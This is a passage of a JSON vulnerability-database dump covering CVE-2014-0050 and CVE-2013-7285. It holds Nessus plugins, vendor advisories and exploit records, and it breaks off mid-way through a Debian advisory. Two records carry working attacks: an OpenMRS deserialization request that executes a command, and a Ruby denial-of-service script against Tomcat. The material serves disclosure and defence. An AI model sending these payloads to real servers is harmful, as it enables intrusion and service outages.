"cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_52.NASL", "href": "https://www.tenable.com/plugins/nessus/72692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72692);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.52\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 7.0.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 7.0.51 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"7.0.51\", min:\"7.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T01:21:45", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.", "edition": 26, "published": "2014-03-28T00:00:00", "title": "Amazon Linux AMI : tomcat7 (ALAS-2014-312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-312.NASL", "href": "https://www.tenable.com/plugins/nessus/73231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-312.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73231);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_xref(name:\"ALAS\", value:\"2014-312\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2014-312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.47-1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:55", "description": "", "published": "2016-01-06T00:00:00", "type": "packetstorm", "title": "OpenMRS Reporting Module 0.9.7 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-06T00:00:00", "id": "PACKETSTORM:135150", "href": "https://packetstormsecurity.com/files/135150/OpenMRS-Reporting-Module-0.9.7-Remote-Code-Execution.html", "sourceData": "`Title: Unauthenticated remote code execution in OpenMRS \nProduct: OpenMRS \nVendor: OpenMRS Inc. \nTested versions: See summary \nStatus: Fixed by vendor \nReported by: Brian D. Hysell \n \nProduct description: \n \nOpenMRS is \"the world's leading open source enterprise electronic \nmedical record system platform.\" \n \nVulnerability summary: \n \nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a \nversion of the XStream library vulnerable to CVE-2013-7285, making it \nvulnerable to remote code execution. If the Appointment Scheduling UI \nModule 1.0.3 is also installed, this RCE is accessible to \nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform \n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3 \ninstalled were confirmed to be vulnerable; other versions and \nconfigurations containing these modules are likely to be vulnerable as \nwell (see \"Remediation\"). \n \nDetails: \n \nIn the Reporting module, the method saveSerializedDefinition (mapped \nto module/reporting/definition/saveSerializedDefinition) in \nInvalidSerializedDefinitionController can be accessed by an \nunauthenticated user. \n \nThe attacker must provide a valid UUID for a definition present in \nOpenMRS or a NullPointerException will be thrown before the remote \ncode execution can take place. However, upon initialization the \nAppointments Scheduling UI module inserts a definition with a constant \nUUID hard-coded into AppointmentSchedulingUIConstants \n(c1bf0730-e69e-11e3-ac10-0800200c9a66). \n \nProof of concept: \n \nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject \n \nRemediation: \n \nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1, \nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5, \n1.10.3, and 1.9.10. \n \nTimeline: \n \nVendor contacted: November 2, 2015 \nVendor replied: November 3 \nCVE requested: November 14 (no response) \nPatch released: December 2 \nAnnounced: January 6, 2016 \n \n \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135150/openmrs-exec.txt"}], "exploitdb": [{"lastseen": "2016-02-04T09:41:24", "description": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution. CVE-2013-7285. Webapps exploit for java platform", "published": "2016-01-07T00:00:00", "type": "exploitdb", "title": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "EDB-ID:39193", "href": "https://www.exploit-db.com/exploits/39193/", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\r\nProduct: OpenMRS\r\nVendor: OpenMRS Inc.\r\nTested versions: See summary\r\nStatus: Fixed by vendor\r\nReported by: Brian D. Hysell\r\n\r\nProduct description:\r\n\r\nOpenMRS is \"the world's leading open source enterprise electronic\r\nmedical record system platform.\"\r\n\r\nVulnerability summary:\r\n\r\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\r\nversion of the XStream library vulnerable to CVE-2013-7285, making it\r\nvulnerable to remote code execution. If the Appointment Scheduling UI\r\nModule 1.0.3 is also installed, this RCE is accessible to\r\nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform\r\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\r\ninstalled were confirmed to be vulnerable; other versions and\r\nconfigurations containing these modules are likely to be vulnerable as\r\nwell (see \"Remediation\").\r\n\r\nDetails:\r\n\r\nIn the Reporting module, the method saveSerializedDefinition (mapped\r\nto module/reporting/definition/saveSerializedDefinition) in\r\nInvalidSerializedDefinitionController can be accessed by an\r\nunauthenticated user.\r\n\r\nThe attacker must provide a valid UUID for a definition present in\r\nOpenMRS or a NullPointerException will be thrown before the remote\r\ncode execution can take place. However, upon initialization the\r\nAppointments Scheduling UI module inserts a definition with a constant\r\nUUID hard-coded into AppointmentSchedulingUIConstants\r\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\r\n\r\nProof of concept:\r\n\r\nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\r\n\r\nRemediation:\r\n\r\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\r\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\r\n1.10.3, and 1.9.10.\r\n\r\nTimeline:\r\n\r\nVendor contacted: November 2, 2015\r\nVendor replied: November 3\r\nCVE requested: November 14 (no response)\r\nPatch released: December 2\r\nAnnounced: January 6, 2016", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39193/"}, {"lastseen": "2016-02-03T15:04:57", "description": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service. CVE-2014-0050. Dos exploits for multiple platform", "published": "2014-02-12T00:00:00", "type": "exploitdb", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EDB-ID:31615", "href": "https://www.exploit-db.com/exploits/31615/", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n \tputs \"\"\r\n puts \"#################################################################################\"\r\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n\tputs \"# #\"\r\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\r\n\tputs \"# their applications are vulnerable to this issue. #\"\r\n\tputs \"# #\"\r\n\tputs \"# Please use responsibly. #\"\r\n\tputs \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = \"\"\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs \"\"\r\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n\tputs \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs \"\"\r\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n\t\tputs \"\"\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs \"Request Launched\"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme==\"https\"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n\treq.body = \"b\"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs \"Timeout - continuing DoS...\"\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31615/"}], "github": [{"lastseen": "2020-03-10T23:26:02", "bulletinFamily": "software", "cvelist": ["CVE-2013-7285"], "description": "Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON.", "edition": 2, "modified": "2019-10-10T20:53:00", "published": "2019-05-29T18:05:03", "id": "GHSA-F554-X222-WGF7", "href": "https://github.com/advisories/GHSA-f554-x222-wgf7", "title": "Critical severity vulnerability that affects com.thoughtworks.xstream:xstream", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-0002"], "description": "The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3 allows remote attackers to read arbitrary files and possibly have other unspecified impact via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-10-16T23:13:26", "id": "GHSA-2FW5-RVF2-JQ56", "href": "https://github.com/advisories/GHSA-2fw5-rvf2-jq56", "title": "High severity vulnerability that affects org.apache.camel:camel-core", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-0003"], "description": "The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-10-16T23:13:49", "id": "GHSA-H6RP-8V4J-HWPH", "href": "https://github.com/advisories/GHSA-h6rp-8v4j-hwph", "title": "High severity vulnerability that affects org.apache.camel:camel-core", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:06", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.", "edition": 2, "modified": "2019-07-03T21:02:05", "published": "2018-12-21T17:51:42", "id": "GHSA-XX68-JFCG-XMMF", "href": "https://github.com/advisories/GHSA-xx68-jfcg-xmmf", "title": "High severity vulnerability that affects commons-fileupload:commons-fileupload", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize objects to XML and back again. A high level facade is supplied that simplifies common use cases. Custom objects can be serialized without need for specifying mappings. Speed and low memory footprint are a crucial part of the design, making it suitable for large object graphs or systems with high message throughput. No information is duplicated that can be obtained via reflection. This results in XML that is easier to read for humans and more compact than native Java serialization. XStream serializes internal fields, including private and final. Supports non-public and inner classes. Classes are not required to have default constructor. Duplicate references encountered in the object-model will be maintained. Supports circular references. By implementing an interface, XStream can serialize directly to/from any tree structure (not just XML). Strategies can be registered allowing customization of how particular types are represented as XML. When an exception occurs due to malformed XML, detailed diagnostics are provided to help isolate and fix the problem. ", "modified": "2014-02-22T00:47:06", "published": "2014-02-22T00:47:06", "id": "FEDORA:CB46E23C05", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: xstream-1.3.1-9.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize objects to XML and back again. A high level facade is supplied that simplifies common use cases. Custom objects can be serialized without need for specifying mappings. Speed and low memory footprint are a crucial part of the design, making it suitable for large object graphs or systems with high message throughput. No information is duplicated that can be obtained via reflection. This results in XML that is easier to read for humans and more compact than native Java serialization. XStream serializes internal fields, including private and final. Supports non-public and inner classes. Classes are not required to have default constructor. Duplicate references encountered in the object-model will be maintained. Supports circular references. By implementing an interface, XStream can serialize directly to/from any tree structure (not just XML). Strategies can be registered allowing customization of how particular types are represented as XML. When an exception occurs due to malformed XML, detailed diagnostics are provided to help isolate and fix the problem. ", "modified": "2014-02-22T00:56:20", "published": "2014-02-22T00:56:20", "id": "FEDORA:04A5C23F7A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: xstream-1.3.1-5.1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:06:10", "published": "2014-02-17T21:06:10", "id": "FEDORA:EA6192175F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: apache-commons-fileupload-1.3-5.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:07:04", "published": "2014-02-17T21:07:04", "id": "FEDORA:58AC321FC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: apache-commons-fileupload-1.3-5.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2017-03-22T18:16:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "modified": "2017-02-17T04:33:34", "published": "2014-02-10T05:56:15", "href": "https://jira.atlassian.com/browse/CONF-32557", "id": "ATLASSIAN:CONF-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "edition": 9, "modified": "2018-10-11T08:42:37", "published": "2014-02-10T05:56:15", "id": "ATLASSIAN:CONFSERVER-32557", "href": "https://jira.atlassian.com/browse/CONFSERVER-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "**Issue Overview:**\n\nMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch \n tomcat7-7.0.47-1.38.amzn1.noarch \n tomcat7-lib-7.0.47-1.38.amzn1.noarch \n tomcat7-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-javadoc-7.0.47-1.38.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch \n \n src: \n tomcat7-7.0.47-1.38.amzn1.src \n \n \n", "edition": 4, "modified": "2014-03-24T23:36:00", "published": "2014-03-24T23:36:00", "id": "ALAS-2014-312", "href": "https://alas.aws.amazon.com/ALAS-2014-312.html", "title": "Medium: tomcat7", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:29:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2856-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nFebruary 07, 2014 http://www.debian.org/security/faq\n- 